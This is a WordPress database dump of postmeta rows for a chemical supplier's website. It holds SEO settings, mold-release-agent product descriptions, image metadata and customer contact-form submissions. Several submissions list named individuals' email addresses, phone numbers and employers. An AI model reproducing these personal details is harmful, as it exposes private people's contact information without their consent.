INSERT INTO `wp_postmeta` VALUES (22578, 2410, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22579, 2410, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22580, 2410, '_yoast_wpseo_focuskw_text_input', 'Oxygen Pump Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (22581, 2410, '_yoast_wpseo_focuskw', 'Oxygen Pump Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (22582, 2410, '_yoast_wpseo_title', 'Krytox Oxygen Pump Lubricant Case Study - Cost Effective Results'); 
INSERT INTO `wp_postmeta` VALUES (22583, 2410, '_yoast_wpseo_metadesc', 'Using Krytox oxygen pump lubricant, the OEM was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.'); 
INSERT INTO `wp_postmeta` VALUES (22584, 2410, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22585, 2410, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22586, 2410, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (22588, 2410, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (22589, 2410, '_yoast_wpseo_linkdex', '98'); 
INSERT INTO `wp_postmeta` VALUES (22590, 401, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (22592, 2410, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22593, 400, '_wp_old_slug', 'releasys-82-semi-permanent-release-agents'); 
INSERT INTO `wp_postmeta` VALUES (22594, 400, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22595, 400, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22596, 400, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (22597, 400, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22598, 400, '_ywtm_content_tab_description', 'ReleaSys 82 is an aerosolized water-based, semi-permanent mold release agent designed to provide reliable, consistent release across a broad range of moldable substrates.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal mold build-up.  ReleaSys 82 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>High durability; Surface activation chemistry</li>\r\n 	<li>Ideal for lower complexity molds</li>\r\n 	<li>Ideal for Rubber to Metal Bonding</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (22599, 400, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22601, 423, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22602, 423, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22603, 423, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (22604, 423, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22605, 423, '_ywtm_content_tab_description', 'ReleaSys 88 is a high performance water-based, semi-permanent mold release agent developed to yield unmatched durability and surface slip. This aerosolized formulation excels at releasing parts from complex, intricate mold geometries. Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. ReleaSys 88 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>High Slip; Superior release agent durability</li>\r\n 	<li>Ideal for complex molds and substrates</li>\r\n 	<li>Minimizes mold build-up and fouling</li>\r\n 	<li>Clean, Non-oily, Non-migrating</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">For a guide on which Release agent systems are right for you click here</a>'); 
INSERT INTO `wp_postmeta` VALUES (22606, 423, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (22613, 2419, '_wp_attached_file', '2016/10/shutterstock_371036624.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22614, 2419, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3541;s:6:"height";i:1940;s:4:"file";s:34:"2016/10/shutterstock_371036624.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_371036624-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_371036624-800x438.jpg";s:5:"width";i:800;s:6:"height";i:438;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_371036624-768x421.jpg";s:5:"width";i:768;s:6:"height";i:421;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_371036624-1600x877.jpg";s:5:"width";i:1600;s:6:"height";i:877;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_371036624-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_371036624-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_371036624-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_371036624-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22615, 2410, '_thumbnail_id', '2419'); 
INSERT INTO `wp_postmeta` VALUES (22618, 2422, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22619, 2422, '_seq_num', '37'); 
INSERT INTO `wp_postmeta` VALUES (22620, 2422, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22621, 2422, '_field_12', 'Matthew Kipphorn'); 
INSERT INTO `wp_postmeta` VALUES (22622, 2422, '_field_13', 'TA Instruments'); 
INSERT INTO `wp_postmeta` VALUES (22623, 2422, '_field_18', '55'); 
INSERT INTO `wp_postmeta` VALUES (22624, 2422, '_field_14', 'mkipphorn@tainstruments.com'); 
INSERT INTO `wp_postmeta` VALUES (22625, 2422, '_field_15', '(302) 427-7032'); 
INSERT INTO `wp_postmeta` VALUES (22626, 2422, '_field_16', 'I am hoping to obtain a RoHS certificate for the following MS P/N:\r\nMS-322B'); 
INSERT INTO `wp_postmeta` VALUES (22627, 2422, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22628, 2422, '_sub_id', '2422'); 
INSERT INTO `wp_postmeta` VALUES (22630, 298, '_wp_attachment_image_alt', 'ReleaSys 8200'); 
INSERT INTO `wp_postmeta` VALUES (22631, 297, '_wp_old_slug', 'releasys-8200'); 
INSERT INTO `wp_postmeta` VALUES (22632, 297, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22633, 297, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22634, 297, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22635, 297, '_yoast_wpseo_focuskw_text_input', 'PTFE Water-based Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (22636, 297, '_yoast_wpseo_focuskw', 'PTFE Water-based Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (22637, 297, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22638, 297, '_yoast_wpseo_focuskeywords', '[{"keyword":"ReleaSys 8200","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22639, 297, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (22640, 2425, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22641, 2425, '_seq_num', '38'); 
INSERT INTO `wp_postmeta` VALUES (22642, 2425, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22643, 2425, '_field_12', 'Bryon Bowen'); 
INSERT INTO `wp_postmeta` VALUES (22644, 2425, '_field_13', 'USAF'); 
INSERT INTO `wp_postmeta` VALUES (22645, 2425, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22646, 2425, '_field_14', 'Bryon.bowen@oln-afmc.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (22647, 2425, '_field_15', '(702) 382-9051'); 
INSERT INTO `wp_postmeta` VALUES (22648, 2425, '_field_16', 'Sir/Ma&#039;am, my name is Bryon Bowen I work with the USAF at Nellis AFB Nevada in the HAZMART area part of my job is tracking chemicals which comes to our base. I received an SDS and saw that it did not have the VOC&#039;s listed. The product is MS-555 SOLVENT CLEANER AND FLUX REMOVER. Is there any way you can provide that information?\nAny help would be greatly appreciated.'); 
INSERT INTO `wp_postmeta` VALUES (22649, 2425, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22650, 2425, '_sub_id', '2425'); 
INSERT INTO `wp_postmeta` VALUES (22652, 2317, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (22654, 2430, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22655, 2430, '_seq_num', '39'); 
INSERT INTO `wp_postmeta` VALUES (22656, 2430, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22657, 2430, '_field_12', 'Bradley May'); 
INSERT INTO `wp_postmeta` VALUES (22658, 2430, '_field_13', 'Alcon'); 
INSERT INTO `wp_postmeta` VALUES (22659, 2430, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22660, 2430, '_field_14', 'bradley.may@alcon.com'); 
INSERT INTO `wp_postmeta` VALUES (22661, 2430, '_field_15', '(610) 670-3827'); 
INSERT INTO `wp_postmeta` VALUES (22662, 2430, '_field_16', 'Hello,\n\nI am requesting a specification sheet or technical data sheet (which includes information such as product size/dimensions, composition, storage requirements, color requirements, etc) for the following Miller Stephenson Chemical product;\n\n-	MS-122DF\n\nPlease let me know if you require any additional information.  I look forward to your response.\n\nRegards,\n\nBrad May\nQuality Engineer \n\nOffice – 6106703827\nCell – 3046680317 \n'); 
INSERT INTO `wp_postmeta` VALUES (22663, 2430, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22664, 2430, '_sub_id', '2430'); 
INSERT INTO `wp_postmeta` VALUES (22665, 2431, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22666, 2431, '_seq_num', '38'); 
INSERT INTO `wp_postmeta` VALUES (22667, 2431, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22668, 2431, '_field_1', 'David Corbin'); 
INSERT INTO `wp_postmeta` VALUES (22669, 2431, '_field_10', 'Zoltek Corporation'); 
INSERT INTO `wp_postmeta` VALUES (22670, 2431, '_field_2', 'david.corbin@zoltek.com'); 
INSERT INTO `wp_postmeta` VALUES (22671, 2431, '_field_8', '(636) 970-5330'); 
INSERT INTO `wp_postmeta` VALUES (22672, 2431, '_field_3', 'I am interested in ordering some Epi-Rez 3515-W-60.\n\nPlease advise on pricing / availability.\n\nThanks!\n\nDavid Corbin'); 
INSERT INTO `wp_postmeta` VALUES (22673, 2431, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22674, 2431, '_sub_id', '2431'); 
INSERT INTO `wp_postmeta` VALUES (22675, 2432, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22676, 2432, '_seq_num', '39'); 
INSERT INTO `wp_postmeta` VALUES (22677, 2432, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22678, 2432, '_field_1', 'Tony Wang'); 
INSERT INTO `wp_postmeta` VALUES (22679, 2432, '_field_10', 'Sigmasil Chem'); 
INSERT INTO `wp_postmeta` VALUES (22680, 2432, '_field_2', 'tony.wang@sigmasil.com'); 
INSERT INTO `wp_postmeta` VALUES (22681, 2432, '_field_8', '(862) 788-7053'); 
INSERT INTO `wp_postmeta` VALUES (22682, 2432, '_field_3', '\n\nDear Sir, \n  \n  \nPlease allow me introduce SIGMASIL as an alternative customer-focused silanes supplier. \n  \nSigmasil specializes in formulating, producing and distributing silane adhesion promoters, coupling agents, crosslinking agents, dispersing agents, surface modifiers and silicone chemistries. Sigmasil helps customers success in fiberglass, plastic or rubber compounding, foundry, water-repellent, polymer synthesis, material treatment, coating, adhesive and sealant industries.\n\nWe would welcome the opportunity to assist in adding value to your supply chain management through our diverse range of products and services. \n  \n\nTony Wang\nManaging Director\nSIGMASIL CHEM\nSilanes &amp; Fumed Silicas\nwww.sigmasil.com \nTel: 86 27 8870 5302\nFax: 86 27 8870 5291\n\n'); 
INSERT INTO `wp_postmeta` VALUES (22683, 2432, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22684, 2432, '_sub_id', '2432'); 
INSERT INTO `wp_postmeta` VALUES (22688, 2435, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22689, 2435, '_seq_num', '40'); 
INSERT INTO `wp_postmeta` VALUES (22690, 2435, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22691, 2435, '_field_1', 'Wesley Mesanovic'); 
INSERT INTO `wp_postmeta` VALUES (22692, 2435, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (22693, 2435, '_field_2', 'wmesanovic@protonmail.com'); 
INSERT INTO `wp_postmeta` VALUES (22694, 2435, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (22695, 2435, '_field_3', 'Hello,\r\n\r\nI was wondering if I could get a price quote for:\r\n1 oz. Krytox gpl103\r\n1 oz. Krytox gpl 205\r\n\r\nAnd to order do I just email the closest sales office?\r\n\r\nThank you,\r\nWes'); 
INSERT INTO `wp_postmeta` VALUES (22696, 2435, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22697, 2435, '_sub_id', '2435'); 
INSERT INTO `wp_postmeta` VALUES (22700, 2436, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22701, 2436, '_seq_num', '41'); 
INSERT INTO `wp_postmeta` VALUES (22702, 2436, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22703, 2436, '_field_1', 'LEYBROS'); 
INSERT INTO `wp_postmeta` VALUES (22704, 2436, '_field_10', 'CEA'); 
INSERT INTO `wp_postmeta` VALUES (22705, 2436, '_field_2', 'antoine.leybros@cea.fr'); 
INSERT INTO `wp_postmeta` VALUES (22706, 2436, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (22707, 2436, '_field_3', 'I contact you because I am interested by  VERTREL fluids for process cleaning.\r\nWe need to use an oil whose reference is &quot;VERTREL MCA More Specialty fluid&quot; as flushing oil with a perfluorinated oil FOMBLIN kind.\r\nDue to the fact that we made laboratory scale tests, the amount used is small (of the order of 500 mL / 1L).\r\n\r\nCould you tell me what would be the smallest amount that you may provide and build me a quote for this application?\r\nDo not hesitate to contact me if you need information supplements,\r\nBest regards,\r\n\r\nDr. Antoine LEYBROS\r\nCEA Marcoule DTCD/SPDE/LPSD\r\nSupercritical Processes and Decontamination Laboratory\r\nBP 17171\r\nF-30207 BAGNOLS SUR CEZE (France)\r\n\r\nEmail : antoine.leybros@cea.fr \r\nTel : +334-66-79-16-41\r\n'); 
INSERT INTO `wp_postmeta` VALUES (22708, 2436, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22709, 2436, '_sub_id', '2436'); 
INSERT INTO `wp_postmeta` VALUES (22712, 16, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (22714, 664, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (22715, 664, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22716, 664, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22717, 664, '_yoast_wpseo_focuskw_text_input', 'Articles'); 
INSERT INTO `wp_postmeta` VALUES (22718, 664, '_yoast_wpseo_focuskw', 'Articles'); 
INSERT INTO `wp_postmeta` VALUES (22719, 664, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22720, 664, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22721, 182, '_wp_old_slug', 'ms-122av'); 
INSERT INTO `wp_postmeta` VALUES (22722, 182, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22723, 182, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22724, 182, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22725, 182, '_yoast_wpseo_focuskw_text_input', 'PTFE release agent'); 
INSERT INTO `wp_postmeta` VALUES (22726, 182, '_yoast_wpseo_focuskw', 'PTFE release agent'); 
INSERT INTO `wp_postmeta` VALUES (22727, 182, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (22728, 182, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22729, 182, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22730, 1519, '_wp_attachment_image_alt', 'MS-122SE'); 
INSERT INTO `wp_postmeta` VALUES (22731, 302, '_wp_old_slug', 'ms-122se'); 
INSERT INTO `wp_postmeta` VALUES (22732, 302, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22733, 302, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22734, 302, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22736, 302, '_yoast_wpseo_focuskw', 'PTFE Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22737, 302, '_yoast_wpseo_content_score', '90'); 
INSERT INTO `wp_postmeta` VALUES (22738, 302, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-122SE","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22739, 984, '_wp_old_slug', 'fpg-182-copy'); 
INSERT INTO `wp_postmeta` VALUES (22740, 984, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22741, 984, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22742, 984, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22743, 984, '_yoast_wpseo_focuskw_text_input', 'Krytox FPG 028'); 
INSERT INTO `wp_postmeta` VALUES (22744, 984, '_yoast_wpseo_focuskw', 'Krytox FPG 028'); 
INSERT INTO `wp_postmeta` VALUES (22745, 984, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22746, 984, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22747, 973, '_wp_old_slug', 'fpg-182'); 
INSERT INTO `wp_postmeta` VALUES (22748, 973, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22749, 973, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22750, 973, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22751, 973, '_yoast_wpseo_focuskw_text_input', 'Krytox FPG 182'); 
INSERT INTO `wp_postmeta` VALUES (22752, 973, '_yoast_wpseo_focuskw', 'Krytox FPG 182'); 
INSERT INTO `wp_postmeta` VALUES (22753, 973, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22754, 973, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22755, 2442, '_edit_lock', '1476301847:2'); 
INSERT INTO `wp_postmeta` VALUES (22756, 303, '_wp_old_slug', 'ms-143te'); 
INSERT INTO `wp_postmeta` VALUES (22757, 303, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22758, 303, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22759, 303, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22760, 303, '_yoast_wpseo_focuskw_text_input', 'PTFE Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (22761, 303, '_yoast_wpseo_focuskw', 'PTFE Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (22762, 303, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (22763, 303, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-143TE","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22764, 2442, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22765, 303, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22766, 1521, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (22767, 2443, '_wp_attached_file', '2016/10/Krytox-Hydrocarbon.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22768, 2443, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:553;s:6:"height";i:576;s:4:"file";s:30:"2016/10/Krytox-Hydrocarbon.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"Krytox-Hydrocarbon-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"Krytox-Hydrocarbon-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"Krytox-Hydrocarbon-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"Krytox-Hydrocarbon-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"Krytox-Hydrocarbon-510x576.jpg";s:5:"width";i:510;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22769, 2444, '_wp_attached_file', '2016/10/krytox-comparison.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22770, 2444, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1093;s:6:"height";i:425;s:4:"file";s:29:"2016/10/krytox-comparison.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-comparison-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"krytox-comparison-800x311.jpg";s:5:"width";i:800;s:6:"height";i:311;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"krytox-comparison-768x299.jpg";s:5:"width";i:768;s:6:"height";i:299;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-comparison-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-comparison-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-comparison-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-comparison-510x425.jpg";s:5:"width";i:510;s:6:"height";i:425;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22771, 2445, '_wp_attached_file', '2016/10/shutterstock_174927275.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22772, 2445, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:34:"2016/10/shutterstock_174927275.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_174927275-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_174927275-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_174927275-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_174927275-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_174927275-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_174927275-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_174927275-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_174927275-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22773, 1522, '_wp_attachment_image_alt', 'ms-143XD'); 
INSERT INTO `wp_postmeta` VALUES (22774, 306, '_wp_old_slug', 'ms-143xd'); 
INSERT INTO `wp_postmeta` VALUES (22775, 306, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22776, 306, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22777, 306, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22778, 306, '_yoast_wpseo_focuskw_text_input', 'Dry Film Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22779, 306, '_yoast_wpseo_focuskw', 'Dry Film Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22780, 306, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22781, 306, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-143XD","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22782, 306, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (22783, 1678, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (22784, 2442, '_thumbnail_id', '2445'); 
INSERT INTO `wp_postmeta` VALUES (22786, 2442, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (22787, 2442, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22788, 2442, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22789, 2442, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22790, 2442, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22791, 2442, '_yoast_wpseo_focuskw_text_input', 'Food Grade Lubricants'); 
